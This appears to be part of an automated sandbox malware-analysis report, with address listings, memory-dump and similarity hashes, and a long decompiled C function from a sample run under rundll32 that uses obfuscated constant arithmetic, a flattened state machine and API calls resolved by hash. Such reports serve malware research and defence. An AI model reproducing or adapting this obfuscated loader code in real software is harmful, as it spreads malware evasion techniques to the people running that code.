                                                                                                                                                            0x00376207
                                                                                                                                                            0x0037620f
                                                                                                                                                            0x00376214
                                                                                                                                                            0x0037621c
                                                                                                                                                            0x00376224
                                                                                                                                                            0x00376232
                                                                                                                                                            0x00376237
                                                                                                                                                            0x0037623d
                                                                                                                                                            0x00376246
                                                                                                                                                            0x0037624b
                                                                                                                                                            0x00376251
                                                                                                                                                            0x00376259
                                                                                                                                                            0x00376261
                                                                                                                                                            0x00376265
                                                                                                                                                            0x0037626a
                                                                                                                                                            0x00376272
                                                                                                                                                            0x00376284
                                                                                                                                                            0x00376289
                                                                                                                                                            0x00376292
                                                                                                                                                            0x0037629d
                                                                                                                                                            0x003762a5
                                                                                                                                                            0x003762a9
                                                                                                                                                            0x003762ae
                                                                                                                                                            0x003762b6
                                                                                                                                                            0x003762be
                                                                                                                                                            0x003762c6
                                                                                                                                                            0x003762ce
                                                                                                                                                            0x003762d6
                                                                                                                                                            0x003762de
                                                                                                                                                            0x003762f0
                                                                                                                                                            0x003762f8
                                                                                                                                                            0x003762ff
                                                                                                                                                            0x0037630a
                                                                                                                                                            0x00376312
                                                                                                                                                            0x0037631a
                                                                                                                                                            0x0037631f
                                                                                                                                                            0x00376327
                                                                                                                                                            0x00376335
                                                                                                                                                            0x00376418
                                                                                                                                                            0x0037647f
                                                                                                                                                            0x00376484
                                                                                                                                                            0x0037648b
                                                                                                                                                            0x003764c8
                                                                                                                                                            0x003764ca
                                                                                                                                                            0x003764d2
                                                                                                                                                            0x0037648d
                                                                                                                                                            0x0037648d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037648d
                                                                                                                                                            0x0037633b
                                                                                                                                                            0x00376341
                                                                                                                                                            0x0037640e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376347
                                                                                                                                                            0x0037634d
                                                                                                                                                            0x003763ec
                                                                                                                                                            0x003763ed
                                                                                                                                                            0x003763ee
                                                                                                                                                            0x003763f3
                                                                                                                                                            0x003763fe
                                                                                                                                                            0x00376404
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376404
                                                                                                                                                            0x00376353
                                                                                                                                                            0x00376359
                                                                                                                                                            0x003764b1
                                                                                                                                                            0x003764b7
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003764bd
                                                                                                                                                            0x0037635f
                                                                                                                                                            0x0037635f
                                                                                                                                                            0x003763bd
                                                                                                                                                            0x003763c2
                                                                                                                                                            0x003763c9
                                                                                                                                                            0x003763cf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003763cf
                                                                                                                                                            0x003763c9
                                                                                                                                                            0x00376359
                                                                                                                                                            0x0037634d
                                                                                                                                                            0x00376341
                                                                                                                                                            0x003764e1
                                                                                                                                                            0x003764e1
                                                                                                                                                            0x003764a6
                                                                                                                                                            0x003764ac
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: U$3n$3$TNz7$`%8$`%8$fxZn$~&t$6B
                                                                                                                                                            • API String ID: 0-1604698900
                                                                                                                                                            • Opcode ID: 307d802ec84d6377ed8e5cb7896349edadc2bf53520bc888bac9ad75b82f6fc7
                                                                                                                                                            • Instruction ID: ff9322c29765f671c6546cb2399286b27fbab066b69ed8d9010a71f5019a5a02
                                                                                                                                                            • Opcode Fuzzy Hash: 307d802ec84d6377ed8e5cb7896349edadc2bf53520bc888bac9ad75b82f6fc7
                                                                                                                                                            • Instruction Fuzzy Hash: 40F10F714087409FD369CF66D58AA4BFBF1FB84B48F10891DF29A86260D7B68849CF03
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                            			E0038F435(intOrPtr* __ecx, signed int __edx) {
                                                                                                                                                            				char _v128;
                                                                                                                                                            				char _v256;
                                                                                                                                                            				char _v288;
                                                                                                                                                            				intOrPtr _v292;
                                                                                                                                                            				signed int _v296;
                                                                                                                                                            				signed int _v300;
                                                                                                                                                            				signed int _v304;
                                                                                                                                                            				signed int _v308;
                                                                                                                                                            				signed int _v312;
                                                                                                                                                            				signed int _v316;
                                                                                                                                                            				signed int _v320;
                                                                                                                                                            				signed int _v324;
                                                                                                                                                            				signed int _v328;
                                                                                                                                                            				signed int _v332;
                                                                                                                                                            				signed int _v336;
                                                                                                                                                            				signed int _v340;
                                                                                                                                                            				signed int _v344;
                                                                                                                                                            				signed int _v348;
                                                                                                                                                            				signed int _v352;
                                                                                                                                                            				signed int _v356;
                                                                                                                                                            				signed int _v360;
                                                                                                                                                            				signed int _v364;
                                                                                                                                                            				signed int _v368;
                                                                                                                                                            				signed int _v372;
                                                                                                                                                            				signed int _v376;
                                                                                                                                                            				signed int _v380;
                                                                                                                                                            				signed int _v384;
                                                                                                                                                            				signed int _v388;
                                                                                                                                                            				signed int _v392;
                                                                                                                                                            				signed int _v396;
                                                                                                                                                            				signed int _v400;
                                                                                                                                                            				signed int _v404;
                                                                                                                                                            				signed int _v408;
                                                                                                                                                            				signed int _v412;
                                                                                                                                                            				signed int _v416;
                                                                                                                                                            				signed int _v420;
                                                                                                                                                            				signed int _v424;
                                                                                                                                                            				signed int _v428;
                                                                                                                                                            				signed int _v432;
                                                                                                                                                            				signed int _v436;
                                                                                                                                                            				signed int _v440;
                                                                                                                                                            				signed int _v444;
                                                                                                                                                            				signed int _v448;
                                                                                                                                                            				signed int _v452;
                                                                                                                                                            				intOrPtr* _v456;
                                                                                                                                                            				signed int _v460;
                                                                                                                                                            				signed int _v464;
                                                                                                                                                            				signed int _v468;
                                                                                                                                                            				signed int _v472;
                                                                                                                                                            				signed int _v476;
                                                                                                                                                            				signed int _v480;
                                                                                                                                                            				signed int _v484;
                                                                                                                                                            				signed int _v488;
                                                                                                                                                            				signed int _v492;
                                                                                                                                                            				signed int _v496;
                                                                                                                                                            				signed int _v500;
                                                                                                                                                            				signed int _v504;
                                                                                                                                                            				signed int _v508;
                                                                                                                                                            				signed int _v512;
                                                                                                                                                            				signed int _v516;
                                                                                                                                                            				signed int _v520;
                                                                                                                                                            				void* _t551;
                                                                                                                                                            				void* _t554;
                                                                                                                                                            				signed int _t560;
                                                                                                                                                            				void* _t563;
                                                                                                                                                            				int _t566;
                                                                                                                                                            				void* _t580;
                                                                                                                                                            				signed int* _t582;
                                                                                                                                                            				void* _t587;
                                                                                                                                                            				signed int _t595;
                                                                                                                                                            				void* _t598;
                                                                                                                                                            				signed int _t601;
                                                                                                                                                            				signed int _t602;
                                                                                                                                                            				signed int _t603;
                                                                                                                                                            				intOrPtr* _t610;
                                                                                                                                                            				signed int _t634;
                                                                                                                                                            				void* _t659;
                                                                                                                                                            				signed int _t675;
                                                                                                                                                            				signed int _t676;
                                                                                                                                                            				signed int _t677;
                                                                                                                                                            				signed int _t678;
                                                                                                                                                            				signed int _t679;
                                                                                                                                                            				signed int _t680;
                                                                                                                                                            				void* _t682;
                                                                                                                                                            				void* _t683;
                                                                                                                                                            				void* _t686;
                                                                                                                                                            				void* _t687;
                                                                                                                                                            				signed int _t692;
                                                                                                                                                            				signed int _t693;
                                                                                                                                                            				signed int* _t694;
                                                                                                                                                            				void* _t698;
                                                                                                                                                            
                                                                                                                                                            				_t694 =  &_v520;
                                                                                                                                                            				_v296 = __edx;
                                                                                                                                                            				_v456 = __ecx;
                                                                                                                                                            				_v308 = 0x7c82e0;
                                                                                                                                                            				_v308 = _v308 ^ 0x9529f8b7;
                                                                                                                                                            				_v308 = _v308 ^ 0x95557a57;
                                                                                                                                                            				_v444 = 0xbd655a;
                                                                                                                                                            				_v444 = _v444 + 0x6586;
                                                                                                                                                            				_v444 = _v444 + 0xffff1486;
                                                                                                                                                            				_v444 = _v444 ^ 0x00b10b5d;
                                                                                                                                                            				_v360 = 0x6df28f;
                                                                                                                                                            				_v360 = _v360 >> 0xc;
                                                                                                                                                            				_v360 = _v360 ^ 0xc93a0f00;
                                                                                                                                                            				_v360 = _v360 ^ 0xc93b57a7;
                                                                                                                                                            				_v380 = 0x803da4;
                                                                                                                                                            				_v380 = _v380 + 0x81b0;
                                                                                                                                                            				_v380 = _v380 << 0x10;
                                                                                                                                                            				_v380 = _v380 ^ 0xbf59b73f;
                                                                                                                                                            				_v484 = 0xdeaf13;
                                                                                                                                                            				_v484 = _v484 | 0x05ba16e8;
                                                                                                                                                            				_v484 = _v484 + 0xffff5e7b;
                                                                                                                                                            				_v484 = _v484 + 0x21a5;
                                                                                                                                                            				_v484 = _v484 ^ 0x05f35408;
                                                                                                                                                            				_v516 = 0x9c12e3;
                                                                                                                                                            				_v516 = _v516 >> 5;
                                                                                                                                                            				_v516 = _v516 + 0x3879;
                                                                                                                                                            				_t686 = 0x618a3a9;
                                                                                                                                                            				_t676 = 0x46;
                                                                                                                                                            				_v516 = _v516 / _t676;
                                                                                                                                                            				_v516 = _v516 ^ 0x000beb5e;
                                                                                                                                                            				_v404 = 0x49e9fe;
                                                                                                                                                            				_v404 = _v404 + 0x1375;
                                                                                                                                                            				_v404 = _v404 | 0x014362a3;
                                                                                                                                                            				_v404 = _v404 ^ 0x01430578;
                                                                                                                                                            				_v408 = 0xd49d0c;
                                                                                                                                                            				_v408 = _v408 + 0x89ee;
                                                                                                                                                            				_v408 = _v408 | 0xbbfa4d8a;
                                                                                                                                                            				_v408 = _v408 ^ 0xbbf95772;
                                                                                                                                                            				_v504 = 0x33cefe;
                                                                                                                                                            				_v504 = _v504 >> 0xa;
                                                                                                                                                            				_v504 = _v504 >> 0xd;
                                                                                                                                                            				_v504 = _v504 + 0xffff4738;
                                                                                                                                                            				_v504 = _v504 ^ 0xfff61340;
                                                                                                                                                            				_v388 = 0x38423a;
                                                                                                                                                            				_t601 = 0x7b;
                                                                                                                                                            				_v388 = _v388 * 0x2c;
                                                                                                                                                            				_v388 = _v388 + 0x7a90;
                                                                                                                                                            				_v388 = _v388 ^ 0x09a92ca6;
                                                                                                                                                            				_v396 = 0x89c34a;
                                                                                                                                                            				_v396 = _v396 >> 6;
                                                                                                                                                            				_v396 = _v396 | 0xaa955d3e;
                                                                                                                                                            				_v396 = _v396 ^ 0xaa9cf099;
                                                                                                                                                            				_v316 = 0x54e1fb;
                                                                                                                                                            				_v316 = _v316 + 0xffff88b2;
                                                                                                                                                            				_v316 = _v316 ^ 0x0053b1cb;
                                                                                                                                                            				_v392 = 0xd67855;
                                                                                                                                                            				_v392 = _v392 + 0xd739;
                                                                                                                                                            				_v392 = _v392 * 0x34;
                                                                                                                                                            				_v392 = _v392 ^ 0x2bb8cf2c;
                                                                                                                                                            				_v512 = 0x9dc1ac;
                                                                                                                                                            				_v512 = _v512 | 0xff1b5e8c;
                                                                                                                                                            				_v512 = _v512 / _t601;
                                                                                                                                                            				_v512 = _v512 + 0xc237;
                                                                                                                                                            				_v512 = _v512 ^ 0x02115509;
                                                                                                                                                            				_v368 = 0xb0c27;
                                                                                                                                                            				_v368 = _v368 * 0x3a;
                                                                                                                                                            				_v368 = _v368 + 0x9417;
                                                                                                                                                            				_v368 = _v368 ^ 0x028ae81d;
                                                                                                                                                            				_v352 = 0x7ea940;
                                                                                                                                                            				_v352 = _v352 + 0xffff6a40;
                                                                                                                                                            				_v352 = _v352 | 0x1d7a7563;
                                                                                                                                                            				_v352 = _v352 ^ 0x1d74a207;
                                                                                                                                                            				_v340 = 0xd37cb9;
                                                                                                                                                            				_v340 = _v340 >> 5;
                                                                                                                                                            				_v340 = _v340 ^ 0x00021b7e;
                                                                                                                                                            				_v384 = 0xc54f7c;
                                                                                                                                                            				_v384 = _v384 | 0xe1c129a4;
                                                                                                                                                            				_v384 = _v384 << 6;
                                                                                                                                                            				_v384 = _v384 ^ 0x7152788e;
                                                                                                                                                            				_v320 = 0xafdf9b;
                                                                                                                                                            				_v320 = _v320 | 0x588bef45;
                                                                                                                                                            				_v320 = _v320 ^ 0x58ad1127;
                                                                                                                                                            				_v508 = 0x7882a6;
                                                                                                                                                            				_v508 = _v508 ^ 0x5ae648f7;
                                                                                                                                                            				_t677 = 0x7e;
                                                                                                                                                            				_v508 = _v508 / _t677;
                                                                                                                                                            				_v508 = _v508 + 0xffff266f;
                                                                                                                                                            				_v508 = _v508 ^ 0x00b4570c;
                                                                                                                                                            				_v344 = 0x25ec7c;
                                                                                                                                                            				_t158 =  &_v344; // 0x25ec7c
                                                                                                                                                            				_t692 = 0x77;
                                                                                                                                                            				_v344 =  *_t158 * 0x48;
                                                                                                                                                            				_v344 = _v344 ^ 0x0aab681c;
                                                                                                                                                            				_v332 = 0xac456;
                                                                                                                                                            				_v332 = _v332 ^ 0x143b2d92;
                                                                                                                                                            				_v332 = _v332 ^ 0x1438ce6d;
                                                                                                                                                            				_v436 = 0x1dd68;
                                                                                                                                                            				_v436 = _v436 + 0x1e14;
                                                                                                                                                            				_v436 = _v436 / _t692;
                                                                                                                                                            				_v436 = _v436 ^ 0x000407e3;
                                                                                                                                                            				_v468 = 0x975814;
                                                                                                                                                            				_v468 = _v468 | 0x165c3dad;
                                                                                                                                                            				_v468 = _v468 >> 3;
                                                                                                                                                            				_v468 = _v468 + 0x9a99;
                                                                                                                                                            				_v468 = _v468 ^ 0x02d4af38;
                                                                                                                                                            				_v428 = 0xd1fa32;
                                                                                                                                                            				_v428 = _v428 + 0x34cd;
                                                                                                                                                            				_v428 = _v428 >> 0xa;
                                                                                                                                                            				_v428 = _v428 ^ 0x000c7c43;
                                                                                                                                                            				_v372 = 0xb93604;
                                                                                                                                                            				_v372 = _v372 >> 0xb;
                                                                                                                                                            				_v372 = _v372 + 0x569f;
                                                                                                                                                            				_v372 = _v372 ^ 0x0001c97c;
                                                                                                                                                            				_v312 = 0xb8b780;
                                                                                                                                                            				_v312 = _v312 / _t601;
                                                                                                                                                            				_v312 = _v312 ^ 0x0009bb57;
                                                                                                                                                            				_v364 = 0xc6b8c5;
                                                                                                                                                            				_v364 = _v364 >> 4;
                                                                                                                                                            				_v364 = _v364 << 0xf;
                                                                                                                                                            				_v364 = _v364 ^ 0x35c8234d;
                                                                                                                                                            				_v500 = 0x5d2db3;
                                                                                                                                                            				_v500 = _v500 | 0xa4ec7bca;
                                                                                                                                                            				_v500 = _v500 * 0x42;
                                                                                                                                                            				_v500 = _v500 + 0xffff6871;
                                                                                                                                                            				_v500 = _v500 ^ 0x8955fb09;
                                                                                                                                                            				_v492 = 0xf8ac1c;
                                                                                                                                                            				_v492 = _v492 + 0xd489;
                                                                                                                                                            				_v492 = _v492 | 0x938b5662;
                                                                                                                                                            				_v492 = _v492 << 6;
                                                                                                                                                            				_v492 = _v492 ^ 0xfef6fac0;
                                                                                                                                                            				_v356 = 0x80a8a7;
                                                                                                                                                            				_v356 = _v356 >> 3;
                                                                                                                                                            				_v356 = _v356 + 0xffff1aa9;
                                                                                                                                                            				_v356 = _v356 ^ 0x00023cc5;
                                                                                                                                                            				_v420 = 0x29f504;
                                                                                                                                                            				_v420 = _v420 ^ 0x96d25191;
                                                                                                                                                            				_v420 = _v420 << 0xa;
                                                                                                                                                            				_v420 = _v420 ^ 0xee96722c;
                                                                                                                                                            				_v476 = 0x6526e6;
                                                                                                                                                            				_t250 =  &_v476; // 0x6526e6
                                                                                                                                                            				_t602 = 9;
                                                                                                                                                            				_t678 = 0x5e;
                                                                                                                                                            				_v476 =  *_t250 * 0x65;
                                                                                                                                                            				_t252 =  &_v476; // 0x6526e6
                                                                                                                                                            				_v476 =  *_t252 * 0x5d;
                                                                                                                                                            				_v476 = _v476 + 0xffffa50d;
                                                                                                                                                            				_v476 = _v476 ^ 0x7f6d4504;
                                                                                                                                                            				_v304 = 0x6f90;
                                                                                                                                                            				_v304 = _v304 + 0xffffb625;
                                                                                                                                                            				_v304 = _v304 ^ 0x0000ce69;
                                                                                                                                                            				_v348 = 0xd48165;
                                                                                                                                                            				_v348 = _v348 * 0x4f;
                                                                                                                                                            				_v348 = _v348 + 0xa298;
                                                                                                                                                            				_v348 = _v348 ^ 0x41980148;
                                                                                                                                                            				_v412 = 0x7e685b;
                                                                                                                                                            				_t271 =  &_v412; // 0x7e685b
                                                                                                                                                            				_v412 =  *_t271 * 0x1d;
                                                                                                                                                            				_v412 = _v412 >> 0xe;
                                                                                                                                                            				_v412 = _v412 ^ 0x000f1110;
                                                                                                                                                            				_v460 = 0xd80dae;
                                                                                                                                                            				_v460 = _v460 * 0x4a;
                                                                                                                                                            				_v460 = _v460 << 9;
                                                                                                                                                            				_v460 = _v460 >> 5;
                                                                                                                                                            				_v460 = _v460 ^ 0x073a202e;
                                                                                                                                                            				_v324 = 0x2acd4f;
                                                                                                                                                            				_v324 = _v324 ^ 0x1744d618;
                                                                                                                                                            				_v324 = _v324 ^ 0x1766082c;
                                                                                                                                                            				_v400 = 0xe6723b;
                                                                                                                                                            				_v400 = _v400 ^ 0x220d80d9;
                                                                                                                                                            				_v400 = _v400 ^ 0x0161a8c1;
                                                                                                                                                            				_v400 = _v400 ^ 0x238d1a3c;
                                                                                                                                                            				_v376 = 0xaaa6;
                                                                                                                                                            				_v376 = _v376 + 0xd31a;
                                                                                                                                                            				_v376 = _v376 + 0xfffff53b;
                                                                                                                                                            				_v376 = _v376 ^ 0x00079406;
                                                                                                                                                            				_v452 = 0xe6cc76;
                                                                                                                                                            				_v452 = _v452 ^ 0xa4c29e28;
                                                                                                                                                            				_v452 = _v452 / _t602;
                                                                                                                                                            				_v452 = _v452 ^ 0x123fe3c8;
                                                                                                                                                            				_v520 = 0x822cac;
                                                                                                                                                            				_v520 = _v520 / _t678;
                                                                                                                                                            				_v520 = _v520 << 4;
                                                                                                                                                            				_v520 = _v520 << 9;
                                                                                                                                                            				_v520 = _v520 ^ 0x2c5f9d39;
                                                                                                                                                            				_v440 = 0xafb195;
                                                                                                                                                            				_v440 = _v440 + 0xffff123a;
                                                                                                                                                            				_v440 = _v440 >> 0xa;
                                                                                                                                                            				_v440 = _v440 ^ 0x0003dc41;
                                                                                                                                                            				_v448 = 0xdf86e4;
                                                                                                                                                            				_v448 = _v448 ^ 0xac60bb5d;
                                                                                                                                                            				_v448 = _v448 ^ 0x5238faed;
                                                                                                                                                            				_v448 = _v448 ^ 0xfe8be764;
                                                                                                                                                            				_v336 = 0x3e14c9;
                                                                                                                                                            				_v336 = _v336 << 7;
                                                                                                                                                            				_v336 = _v336 ^ 0x1f0fc953;
                                                                                                                                                            				_v496 = 0x4885f3;
                                                                                                                                                            				_v496 = _v496 * 0x25;
                                                                                                                                                            				_v496 = _v496 + 0x3aa8;
                                                                                                                                                            				_v496 = _v496 + 0xffff73aa;
                                                                                                                                                            				_v496 = _v496 ^ 0x0a7b30ee;
                                                                                                                                                            				_v480 = 0xca6b34;
                                                                                                                                                            				_v480 = _v480 >> 9;
                                                                                                                                                            				_v480 = _v480 + 0xfb6a;
                                                                                                                                                            				_v480 = _v480 / _t692;
                                                                                                                                                            				_v480 = _v480 ^ 0x000164ed;
                                                                                                                                                            				_v432 = 0xb19133;
                                                                                                                                                            				_t679 = 0x63;
                                                                                                                                                            				_t693 = _v296;
                                                                                                                                                            				_v432 = _v432 * 0x53;
                                                                                                                                                            				_v432 = _v432 >> 0x10;
                                                                                                                                                            				_v432 = _v432 ^ 0x00018cb4;
                                                                                                                                                            				_v328 = 0xdb466c;
                                                                                                                                                            				_t603 = _v296;
                                                                                                                                                            				_v328 = _v328 / _t679;
                                                                                                                                                            				_v328 = _v328 ^ 0x000e2190;
                                                                                                                                                            				_v488 = 0xd48740;
                                                                                                                                                            				_t680 = 0x44;
                                                                                                                                                            				_v488 = _v488 * 7;
                                                                                                                                                            				_v488 = _v488 * 0x66;
                                                                                                                                                            				_v488 = _v488 + 0x34f;
                                                                                                                                                            				_v488 = _v488 ^ 0x50c19e73;
                                                                                                                                                            				_v424 = 0xacfab2;
                                                                                                                                                            				_v424 = _v424 / _t680;
                                                                                                                                                            				_v424 = _v424 | 0xedf008b5;
                                                                                                                                                            				_v424 = _v424 ^ 0xedf22909;
                                                                                                                                                            				_v472 = 0x2e74a8;
                                                                                                                                                            				_v472 = _v472 * 0x3f;
                                                                                                                                                            				_v472 = _v472 ^ 0x6424471f;
                                                                                                                                                            				_v472 = _v472 >> 0xb;
                                                                                                                                                            				_v472 = _v472 ^ 0x0009d0c0;
                                                                                                                                                            				_v416 = 0x7e19d4;
                                                                                                                                                            				_v416 = _v416 << 0xd;
                                                                                                                                                            				_v416 = _v416 + 0x1081;
                                                                                                                                                            				_v416 = _v416 ^ 0xc3344569;
                                                                                                                                                            				_v464 = 0xa74bb7;
                                                                                                                                                            				_v464 = _v464 >> 0xb;
                                                                                                                                                            				_v464 = _v464 + 0x9c4;
                                                                                                                                                            				_v464 = _v464 >> 6;
                                                                                                                                                            				_v464 = _v464 ^ 0x000976a8;
                                                                                                                                                            				while(1) {
                                                                                                                                                            					L1:
                                                                                                                                                            					_t551 = 0xf168e34;
                                                                                                                                                            					do {
                                                                                                                                                            						while(1) {
                                                                                                                                                            							L2:
                                                                                                                                                            							_t698 = _t686 - 0x7498ebf;
                                                                                                                                                            							if(_t698 > 0) {
                                                                                                                                                            								break;
                                                                                                                                                            							}
                                                                                                                                                            							if(_t698 == 0) {
                                                                                                                                                            								_push(_v496);
                                                                                                                                                            								_push(_v336);
                                                                                                                                                            								_push(_v448);
                                                                                                                                                            								_t580 = E00377F1D(_v480, _t603, _v432, E00388606(_v440, 0x371560, __eflags), _v328, _v292 - _t603, _v488);
                                                                                                                                                            								E0037A8B0(_v424, _t577, _v472);
                                                                                                                                                            								_t582 = _v296;
                                                                                                                                                            								 *_t582 = _t693;
                                                                                                                                                            								_t582[1] = _t603 + _t580 - _t693;
                                                                                                                                                            								goto L29;
                                                                                                                                                            							}
                                                                                                                                                            							if(_t686 == 0x488924) {
                                                                                                                                                            								_t682 = _t682 +  *((intOrPtr*)(_t610 + 4));
                                                                                                                                                            								_push(_t610);
                                                                                                                                                            								_push(_t610);
                                                                                                                                                            								_t693 = E00377FF2(_t682);
                                                                                                                                                            								__eflags = _t693;
                                                                                                                                                            								_t551 = 0xf168e34;
                                                                                                                                                            								_t610 = _v456;
                                                                                                                                                            								_t686 =  !=  ? 0xf168e34 : 0xe639f63;
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            							if(_t686 == 0x123a276) {
                                                                                                                                                            								_push(_v468);
                                                                                                                                                            								_push(_v436);
                                                                                                                                                            								_t587 = E0038DCF7(_v332, 0x3715c0, __eflags);
                                                                                                                                                            								_push( &_v256);
                                                                                                                                                            								_push(_t587);
                                                                                                                                                            								_push(_t682);
                                                                                                                                                            								_push(_v300);
                                                                                                                                                            								 *((intOrPtr*)(E0037A42D(0xab2a8d8a, 0x2b7)))();
                                                                                                                                                            								E0037A8B0(_v428, _t587, _v372);
                                                                                                                                                            								_t694 =  &(_t694[5]);
                                                                                                                                                            								_t686 = 0x488924;
                                                                                                                                                            								L12:
                                                                                                                                                            								_t610 = _v456;
                                                                                                                                                            								while(1) {
                                                                                                                                                            									L1:
                                                                                                                                                            									_t551 = 0xf168e34;
                                                                                                                                                            									goto L2;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            							if(_t686 != 0x57ff6e7) {
                                                                                                                                                            								if(_t686 == 0x5f676f3) {
                                                                                                                                                            									_t598 = E00380AE0(8, 1);
                                                                                                                                                            									_push(_v516);
                                                                                                                                                            									_t682 = _t598;
                                                                                                                                                            									_push( &_v288);
                                                                                                                                                            									_push(_t682);
                                                                                                                                                            									_push(9);
                                                                                                                                                            									E003780E3(_v380, _v484);
                                                                                                                                                            									_t686 = 0x7f96e60;
                                                                                                                                                            									L11:
                                                                                                                                                            									_t694 =  &(_t694[6]);
                                                                                                                                                            									goto L12;
                                                                                                                                                            								} else {
                                                                                                                                                            									if(_t686 != 0x618a3a9) {
                                                                                                                                                            										goto L28;
                                                                                                                                                            									} else {
                                                                                                                                                            										_t686 = 0x5f676f3;
                                                                                                                                                            										continue;
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            								L30:
                                                                                                                                                            								return _t595;
                                                                                                                                                            							}
                                                                                                                                                            							_t682 = 0x4000;
                                                                                                                                                            							_push(_t610);
                                                                                                                                                            							_push(_t610);
                                                                                                                                                            							_t595 = E00377FF2(0x4000);
                                                                                                                                                            							_v300 = _t595;
                                                                                                                                                            							__eflags = _t595;
                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                            								_t686 = 0x123a276;
                                                                                                                                                            								goto L12;
                                                                                                                                                            							}
                                                                                                                                                            							goto L30;
                                                                                                                                                            						}
                                                                                                                                                            						__eflags = _t686 - 0x7f96e60;
                                                                                                                                                            						if(_t686 == 0x7f96e60) {
                                                                                                                                                            							_t554 = E00380AE0(0x10, 4);
                                                                                                                                                            							_push(_v396);
                                                                                                                                                            							_t682 = _t554;
                                                                                                                                                            							_push( &_v128);
                                                                                                                                                            							_push(_t682);
                                                                                                                                                            							_push(0xb);
                                                                                                                                                            							E003780E3(_v504, _v388);
                                                                                                                                                            							_t610 = _v456;
                                                                                                                                                            							_t694 =  &(_t694[6]);
                                                                                                                                                            							_t686 = 0x8d9b717;
                                                                                                                                                            							_t551 = 0xf168e34;
                                                                                                                                                            							goto L28;
                                                                                                                                                            						} else {
                                                                                                                                                            							__eflags = _t686 - 0x8d9b717;
                                                                                                                                                            							if(_t686 == 0x8d9b717) {
                                                                                                                                                            								_t687 =  &_v256;
                                                                                                                                                            								_t659 = E00380AE0(0x10, 8);
                                                                                                                                                            								_t560 = _v308;
                                                                                                                                                            								__eflags = _t560 - _t659;
                                                                                                                                                            								if(_t560 < _t659) {
                                                                                                                                                            									_t675 = _t659 - _t560;
                                                                                                                                                            									_t683 = _t687;
                                                                                                                                                            									_t634 = _t675 >> 1;
                                                                                                                                                            									__eflags = _t634;
                                                                                                                                                            									_t566 = memset(_t683, 0x2d002d, _t634 << 2);
                                                                                                                                                            									asm("adc ecx, ecx");
                                                                                                                                                            									_t687 = _t687 + _t675 * 2;
                                                                                                                                                            									memset(_t683 + _t634, _t566, 0);
                                                                                                                                                            									_t694 =  &(_t694[6]);
                                                                                                                                                            								}
                                                                                                                                                            								_t563 = E00380AE0(0x10, 8);
                                                                                                                                                            								_push(_v384);
                                                                                                                                                            								_t682 = _t563;
                                                                                                                                                            								_push(_t687);
                                                                                                                                                            								_push(_t682);
                                                                                                                                                            								_push(0xb);
                                                                                                                                                            								E003780E3(_v352, _v340);
                                                                                                                                                            								_t686 = 0x57ff6e7;
                                                                                                                                                            								goto L11;
                                                                                                                                                            							} else {
                                                                                                                                                            								__eflags = _t686 - 0xa9d081a;
                                                                                                                                                            								if(_t686 == 0xa9d081a) {
                                                                                                                                                            									E0037ED7E(_v452, _t603, _v520,  *_t610,  *((intOrPtr*)(_t610 + 4)));
                                                                                                                                                            									_t610 = _v456;
                                                                                                                                                            									_t694 =  &(_t694[3]);
                                                                                                                                                            									_t686 = 0x7498ebf;
                                                                                                                                                            									_t603 = _t603 +  *((intOrPtr*)(_t610 + 4));
                                                                                                                                                            									goto L1;
                                                                                                                                                            								} else {
                                                                                                                                                            									__eflags = _t686 - 0xe639f63;
                                                                                                                                                            									if(_t686 == 0xe639f63) {
                                                                                                                                                            										E00388519(_v416, _v464, _v300);
                                                                                                                                                            										return 0;
                                                                                                                                                            									}
                                                                                                                                                            									__eflags = _t686 - _t551;
                                                                                                                                                            									if(__eflags != 0) {
                                                                                                                                                            										goto L28;
                                                                                                                                                            									} else {
                                                                                                                                                            										_push(_v476);
                                                                                                                                                            										_push(_v420);
                                                                                                                                                            										_v292 = _t682 + _t693;
                                                                                                                                                            										_push(_v356);
                                                                                                                                                            										_t603 = E0038C0C1( &_v128, __eflags,  &_v288, E00388606(_v492, 0x371610, __eflags),  &_v256, _v348, _v412, _v460, _t693, _t682 + _t693 - _t693, _v324) + _t693;
                                                                                                                                                            										E0037A8B0(_v400, _t572, _v376);
                                                                                                                                                            										_t694 =  &(_t694[0xd]);
                                                                                                                                                            										_t686 = 0xa9d081a;
                                                                                                                                                            										goto L12;
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						goto L30;
                                                                                                                                                            						L28:
                                                                                                                                                            						__eflags = _t686 - 0x7bf1275;
                                                                                                                                                            					} while (__eflags != 0);
                                                                                                                                                            					L29:
                                                                                                                                                            					return _v300;
                                                                                                                                                            				}
                                                                                                                                                            			}

                                                                                                                                                            0x0038f603
                                                                                                                                                            0x0038f60e
                                                                                                                                                            0x0038f619
                                                                                                                                                            0x0038f624
                                                                                                                                                            0x0038f62f
                                                                                                                                                            0x0038f63a
                                                                                                                                                            0x0038f64d
                                                                                                                                                            0x0038f654
                                                                                                                                                            0x0038f65f
                                                                                                                                                            0x0038f667
                                                                                                                                                            0x0038f675
                                                                                                                                                            0x0038f679
                                                                                                                                                            0x0038f681
                                                                                                                                                            0x0038f689
                                                                                                                                                            0x0038f69c
                                                                                                                                                            0x0038f6a3
                                                                                                                                                            0x0038f6ae
                                                                                                                                                            0x0038f6bb
                                                                                                                                                            0x0038f6c6
